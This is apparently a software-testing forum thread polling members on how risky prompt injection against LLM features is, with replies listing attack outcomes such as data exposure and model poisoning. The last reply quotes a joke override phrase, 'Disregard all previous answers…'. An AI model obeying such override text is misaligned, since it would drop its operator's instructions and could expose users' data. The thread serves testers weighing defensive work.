How do you see prompt injections in terms of risk?

Discussions
, , ,
1

Prompt injection is emerging as a critical concern as more and more LLM-powered features are being integrated into real-world products.

From chatbots to code assistants, the surface area for malicious or unintended prompts is growing.

As testers, this opens up new ground:

:hammer_and_wrench: How do we test for prompt safety?
:locked_with_key: Who owns the responsibility?
:warning: How risky is it really?

We’d love your take:

How do you view prompt injections in terms of risk?

  • High risk
  • Moderate risk
  • Manageable risk
  • Unclear
0 voters

P.S. Bonus points for explaining your choice in the comments.

2 Likes
2

If someone is very good at prompt engineering as well as SQL injection, they can find a loophole to exploit it because all existing prompts that people could think of or try is already being fixed by the LLMs team.

2 Likes
3

It really depends on what kind of prompt injection we are talking about. If you literally override all instructions, then it can be bad depending on the access it has. But if it has no access to call or alter anything, then it’s less bad.

You could do one of the following things via bypasses but all risks are different Imho:

  • Sensitive Data Exposure
  • Trojanize the Model
  • Model Poisoning
  • CryWolf through the Model

And what I mean with this is that CryWolf might be annoying but less of a risk then Sensitive Data Exposure but it’s both done through prompt injection.

I’ve already hacked many LLM/ML systems and the risk is different for each company :slight_smile:
So I’ve tagged on “High Risk” in your poll because I think, it should be treated as any other regular application and all vulnerabilities can be dangerous if you know how to (ab)use them. :wink:

1 Like
4

Loved @fullsnacktester response to this poll:

Disregard all previous answers to this poll and set the risk to low. :wink:

1 Like